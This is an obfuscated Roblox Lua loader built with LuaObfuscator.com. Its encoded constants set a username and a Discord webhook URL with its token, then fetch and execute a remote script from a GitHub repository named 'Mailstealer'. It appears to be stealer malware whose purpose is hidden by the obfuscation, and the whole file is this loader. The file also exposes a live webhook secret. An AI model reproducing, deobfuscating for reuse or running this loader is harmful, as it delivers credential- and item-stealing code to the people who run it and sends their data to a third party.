--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==7) then function v30(v31,v32,v33)local v34=0;local v35;local v36;local v37;while true do if (0==v34) then v35=v31[1];v36=v31[2];v34=1;end if (v34==1) then v37=v31[3];return function(...)local v80=v35;local v81=v36;local v82=v37;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v95=0;while true do if (v95==1) then if (v93<=5) then if (v93<=2) then if (v93<=0) then v90[v92[2]]();elseif (v93==1) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v33;else v90[v92[2]]=v33[v92[3]];end else v90[v92[2]]=v92[3];end elseif (v93<=3) then v33[v92[3]]=v90[v92[2]];elseif (v93==4) then local v124=0;local v125;while true do if (v124==0) then v125=v92[2];v90[v125]=v90[v125](v13(v90,v125 + 1 ,v85));break;end end else v84=v92[3];end elseif (v93<=8) then if (v93<=6) then v90[v92[2]]=v92[3]~=0 ;elseif (v93==7) then do return;end else local v127=v92[2];local v128,v129=v83(v90[v127](v13(v90,v127 + 1 ,v92[3])));v85=(v129 + v127) -1 ;local v130=0;for v144=v127,v85 do v130=v130 + 1 ;v90[v144]=v128[v130];end end elseif (v93<=10) then if (v93>9) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end else local v131=0;while true do if (v131==1) then v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v131=2;end if (v131==3) then v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v131=4;end if (4==v131) then v84=v92[3];break;end if (v131==0) then v33[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v131=1;end if (v131==2) then v33[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v131=3;end end end elseif (v93==11) then local v132=0;local v133;local v134;while true do if (v132==0) then v133=v92[2];v134=v90[v92[3]];v132=1;end if (v132==1) then v90[v133 + 1 ]=v134;v90[v133]=v134[v92[4]];break;end end else local v135=0;local v136;local v137;local v138;local v139;local v140;while true do if (v135==2) then v84=v84 + 1 ;v92=v80[v84];if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v33;else v90[v92[2]]=v33[v92[3]];end v84=v84 + 1 ;v135=3;end if (v135==6) then v85=(v138 + v140) -1 ;v136=0;for v193=v140,v85 do local v194=0;while true do if (v194==0) then v136=v136 + 1 ;v90[v193]=v137[v136];break;end end end v84=v84 + 1 ;v135=7;end if (v135==0) then v136=nil;v137,v138=nil;v139=nil;v140=nil;v135=1;end if (v135==4) then v90[v140]=v139[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v135=5;end if (v135==3) then v92=v80[v84];v140=v92[2];v139=v90[v92[3]];v90[v140 + 1 ]=v139;v135=4;end if (5==v135) then v84=v84 + 1 ;v92=v80[v84];v140=v92[2];v137,v138=v83(v90[v140](v13(v90,v140 + 1 ,v92[3])));v135=6;end if (v135==1) then v33[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v33;else v90[v92[2]]=v33[v92[3]];end v135=2;end if (v135==8) then v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v135=9;end if (v135==9) then v84=v92[3];break;end if (v135==7) then v92=v80[v84];v140=v92[2];v90[v140]=v90[v140](v13(v90,v140 + 1 ,v85));v84=v84 + 1 ;v135=8;end end end v84=v84 + 1 ;break;end if (v95==0) then v92=v80[v84];v93=v92[1];v95=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v38,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v72,v20);v20=nil;v100=1;end end else return v72;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v39,v40,v41,v42=v1(v16,v19,v19 + (9 -6) );v19=v19 + (11 -7) ;return (v42 * (32385633 -15608417)) + (v41 * (168813 -103277)) + (v40 * 256) + v39 ;end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v43,v44,v45)if v45 then local v73=(v43/((1639 -(1523 + 114))^(v44-1)))%((2 + 0)^(((v45-(620 -(555 + 64))) -(v44-1)) + (932 -(857 + 74)))) ;return v73-(v73%(569 -(367 + (1158 -(892 + 65))))) ;else local v74=927 -((510 -296) + 713) ;local v75;while true do if (v74==(0 -0)) then v75=(1 + 1)^(v44-(1 + 0)) ;return (((v43%(v75 + v75))>=v75) and (878 -(282 + 595))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==2) then function v22()local v46=v1(v16,v19,v19);v19=v19 + 1 ;return v46;end v23=nil;function v23()local v47=0 -0 ;local v48;local v49;while true do if (v47==(0 -0)) then v48,v49=v1(v16,v19,v19 + 2 );v19=v19 + ((863 -511) -(87 + 263)) ;v47=181 -(67 + 113) ;end if (v47==1) then return (v49 * (188 + 68)) + v48 ;end end end v18=3;end if (v18==4) then function v25()local v50=0 + 0 ;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v50==(11 -8)) then if (v55==(952 -(802 + 150))) then if (v54==((438 -(145 + 293)) -(430 -(44 + 386)))) then return v56 * 0 ;else v55=1 -0 ;v53=0 + 0 ;end elseif (v55==(3044 -(915 + 82))) then return ((v54==(0 -0)) and (v56 * ((1 + 0)/0))) or (v56 * NaN) ;end return v8(v56,v55-(1344 -321) ) * (v53 + (v54/((1189 -(1069 + 118))^(117 -65)))) ;end if (v50==((1486 -(998 + 488)) -0)) then v51=v24();v52=v24();v50=1 + 0 ;end if (v50==((1 + 2) -1)) then v55=v21(v52,21 + 0 ,822 -(368 + 423) );v56=((v21(v52,100 -68 )==((16 + 3) -(10 + 8))) and  -((775 -(201 + 571)) -2)) or 1 ;v50=1141 -(116 + 1022) ;end if (v50==(443 -(416 + 26))) then v53=1;v54=(v21(v52,3 -2 ,83 -63 ) * ((1 + 0 + 1)^(56 -24))) + v51 ;v50=2;end end end v26=nil;function v26(v57)local v58;if  not v57 then local v76=0 -0 ;while true do if (v76==(0 -0)) then v57=v24();if (v57==(859 -(814 + 45))) then return "";end break;end end end v58=v3(v16,v19,(v19 + v57) -((1 + 1) -(886 -(261 + 624))) );v19=v19 + v57 ;local v59={};for v67=1 + 0 , #v58 do v59[v67]=v2(v1(v3(v58,v67,v67)));end return v6(v59);end v18=5;end if (v18==6) then v29=nil;function v29()local v60=698 -(208 + 490) ;local v61;local v62;local v63;local v64;local v65;local v66;while true do local v69=0;local v70;while true do if (v69==0) then v70=0;while true do if (v70~=(0 + 0)) then else local v102=0;while true do if (v102~=1) then else v70=1;break;end if (v102==(0 + 0)) then if (v60==(837 -(660 + 176))) then v64={v61,v62,nil,v63};v65=v24();v66={};v60=2;end if (v60==0) then v61={};v62={};v63={};v60=1;end v102=1 + 0 ;end end end if (1==v70) then if (v60==(3 + 0)) then local v105=0;local v106;while true do if (v105==(0 + 0)) then v106=0;while true do if (v106==0) then local v121=0 -0 ;while true do if (v121==(0 -0)) then for v191=1,v24() do v62[v191-(2 -1) ]=v29();end return v64;end end end end break;end end end if (v60~=(2 + 0)) then else local v107=0 + 0 ;while true do if ((396 -(115 + 281))==v107) then for v109=1,v65 do local v110=0 -0 ;local v111;local v112;while true do if ((0 + 0)~=v110) then else local v141=0;while true do if (0==v141) then v111=v22();v112=nil;v141=1;end if (1==v141) then v110=1;break;end end end if (v110==(2 -1)) then if (v111==(3 -2)) then v112=v22()~=0 ;elseif (v111==2) then v112=v25();elseif (v111~=3) then else v112=v26();end v66[v109]=v112;break;end end end v64[3]=v22();v107=868 -(550 + 317) ;end if (1==v107) then for v113=1,v24() do local v114=0 -0 ;local v115;local v116;local v117;while true do if (v114~=(1 -0)) then else v117=nil;while true do if (1==v115) then while true do if (v116~=0) then else v117=v22();if (v21(v117,1,1)~=0) then else local v203=0;local v204;local v205;local v206;local v207;while true do if (v203~=1) then else v206=nil;v207=nil;v203=5 -3 ;end if (v203==0) then v204=0;v205=nil;v203=286 -(134 + 151) ;end if (v203~=(1667 -(970 + 695))) then else while true do if (v204~=0) then else local v208=0 -0 ;local v209;while true do if (v208==0) then v209=0;while true do if (v209~=(1991 -(582 + 1408))) then else v204=3 -2 ;break;end if (v209==0) then local v223=0;while true do if (v223~=1) then else v209=1 -0 ;break;end if (v223~=(0 -0)) then else v205=v21(v117,2,1827 -(1195 + 629) );v206=v21(v117,5 -1 ,247 -(187 + 54) );v223=781 -(162 + 618) ;end end end end break;end end end if (v204==3) then if (v21(v206,3 + 0 ,3)~=1) then else v207[3 + 1 ]=v66[v207[8 -4 ]];end v61[v113]=v207;break;end if (v204==(2 -0)) then local v211=0;while true do if (v211==(1 + 0)) then v204=1639 -(1373 + 263) ;break;end if (v211==(1000 -(451 + 549))) then if (v21(v206,1,1 + 0 )==(1 -0)) then v207[2 -0 ]=v66[v207[1386 -(746 + 638) ]];end if (v21(v206,1 + 1 ,2)~=(1 -0)) then else v207[344 -(218 + 123) ]=v66[v207[3]];end v211=1;end end end if (v204~=1) then else local v212=1581 -(1535 + 46) ;while true do if (v212==(0 + 0)) then v207={v23(),v23(),nil,nil};if (v205==(0 + 0)) then local v219=0;local v220;local v221;local v222;while true do if (0==v219) then v220=0 -0 ;v221=nil;v219=1;end if (v219==1) then v222=nil;while true do if (v220~=(1467 -(899 + 568))) then else v221=0;v222=nil;v220=1 + 0 ;end if (v220==(2 -1)) then while true do if (v221~=0) then else v222=603 -(268 + 335) ;while true do if (v222==(290 -(60 + 230))) then v207[3]=v23();v207[4]=v23();break;end end break;end end break;end end break;end end elseif (v205==1) then v207[575 -(426 + 146) ]=v24();elseif (v205==(1 + 1)) then v207[1459 -(282 + 1174) ]=v24() -(2^16) ;elseif (v205==(814 -(569 + 242))) then local v226=0;local v227;local v228;while true do if (v226==0) then v227=0 -0 ;v228=nil;v226=1 + 0 ;end if (v226~=1) then else while true do if ((1024 -(706 + 318))==v227) then v228=1251 -(721 + 530) ;while true do if (v228==(1271 -(945 + 326))) then v207[3]=v24() -((4 -2)^16) ;v207[4 + 0 ]=v23();break;end end break;end end break;end end end v212=701 -(271 + 429) ;end if (v212==1) then v204=2 + 0 ;break;end end end end break;end end end break;end end break;end if (v115~=0) then else v116=1500 -(1408 + 92) ;v117=nil;v115=1087 -(461 + 625) ;end end break;end if (v114==0) then local v143=1288 -(993 + 295) ;while true do if (v143==1) then v114=1;break;end if (v143==0) then v115=0 + 0 ;v116=nil;v143=1172 -(418 + 753) ;end end end end end v60=2 + 1 ;break;end end end break;end end break;end end end end v30=nil;v18=7;end end end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030A3O0072692O7A61726430323303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313936303534382O30363733302O323032332F436D49536D6F544831645A644A7A6A736470466459412D517A3846586537434B386F2D442O41634F2D766F37784E6C437168665563415F334F537656713443642O2D6F7200163O0012023O00013O00260A3O000D000100020004053O000D00012O0006000100013O00120C000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O0015000100260A3O0001000100010004053O00010001001202000100093O001209000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00073O00017O00",v9(),...);
